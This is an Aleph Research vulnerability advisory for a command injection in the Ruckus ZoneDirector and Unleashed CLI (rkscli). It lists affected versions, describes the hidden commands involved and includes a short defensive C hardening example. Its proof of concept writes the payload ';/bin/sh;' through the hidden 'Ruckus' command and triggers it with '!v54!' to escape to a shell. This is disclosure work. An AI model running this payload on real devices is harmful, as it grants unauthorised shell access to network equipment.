Ruckus CLI (rkscli) jailbreak

Aleph Research Advisory





  • ZoneDirector
  • Unleashed

Vulnerable Version

  • ZoneDirector: 9.9 and before
  • ZoneDirector: 9.10.x
  • ZoneDirector: 9.12.x
  • ZoneDirector: 9.13.x
  • ZoneDirector: 10.0.x
  • ZoneDirector: 10.1.x
  • ZoneDirector: 10.2.x
  • ZoneDirector: 10.3.x
  • Unleashed: 200.6 and before
  • Unleashed: 200.7


  • 9.10.x: Upgrade to
  • 9.12.x: Upgrade to
  • 9.13.x: Upgrade to
  • 10.0.x: Upgrade to
  • 10.1.x: Upgrade to
  • 10.2.x: Upgrade to
  • 10.3.x: Upgrade to
  • 200.6 and before: Upgrade to
  • 200.7: Upgrade to

Technical Details

This is a command injection vulnerability, exploitable through a crafted CLI command by a user with admin privilege.

/usr/bin/rkscli is the CLI that Ruckus uses for user interaction and for running commands from the web interface. rkscli has a hidden CLI command, Ruckus, that writes a limited string to /writable/etc/system/access. !v54! is another hidden command. If !v54! does not receive any arguments, it executes /usr/sbin/sesame with the content of /writable/etc/system/access.

The Ruckus command can write a command injection payload into /writable/etc/system/access. !v54! then executes this payload, which escapes to a busybox shell.
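A hardening sketch for the pattern described above, as an added example that is not Ruckus code and not part of the original advisory. It assumes the stored string reaches the helper through a shell-parsed command line; the allowlist, the length limit and the function names are hypothetical.

```c
/* Added example (not Ruckus code): hand a stored string to a helper
 * without letting a shell parse it. Names and limits are assumptions. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

#define MAX_VALUE_LEN 64  /* assumed limit for the stored string */

/* Allowlist: 1..MAX_VALUE_LEN characters from [A-Za-z0-9_.-] only. */
int access_value_ok(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > MAX_VALUE_LEN)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '_' && c != '.' && c != '-')
            return 0;
    }
    return 1;
}

/* Run helper with value as one argv element. Returns the helper's exit
 * status, 127 if it could not be executed, or -1 if rejected/failed. */
int run_helper(const char *helper, const char *value)
{
    if (!access_value_ok(value))
        return -1;                      /* reject before anything runs */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)helper, (char *)value, NULL };
        execv(helper, argv);            /* no shell: ';' has no meaning */
        _exit(127);                     /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Constructed input: the advisory's payload is rejected (-1). */
    printf("%d\n", run_helper("/usr/sbin/sesame", ";/bin/sh;"));
    return 0;
}
```

The two controls are independent: the allowlist stops the payload from being accepted, and the argv-based exec means a value that slipped past validation would still arrive as a single argument instead of being interpreted as shell syntax.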

Information about the exploitation of the vulnerability can be found in our 36C3 talk.

Proof Of Concept

Jailbreaking the Ruckus CLI using this exploit:

rkscli: Ruckus <-input ";/bin/sh;"

rkscli: !v54!
What's your chow: 

Ruckus Wireless ZoneDirector -- Command Line Interface
Enter 'help' for a list of built-in commands.

ruckus$ echo $USER


  • 31-Dec-19: Public disclosure.
  • 24-Dec-19: Patch available.
  • 17-Dec-19: ALEPH-2019014 assigned.
  • 19-Sep-19: Reported (Ruckus Product Security Team).


External References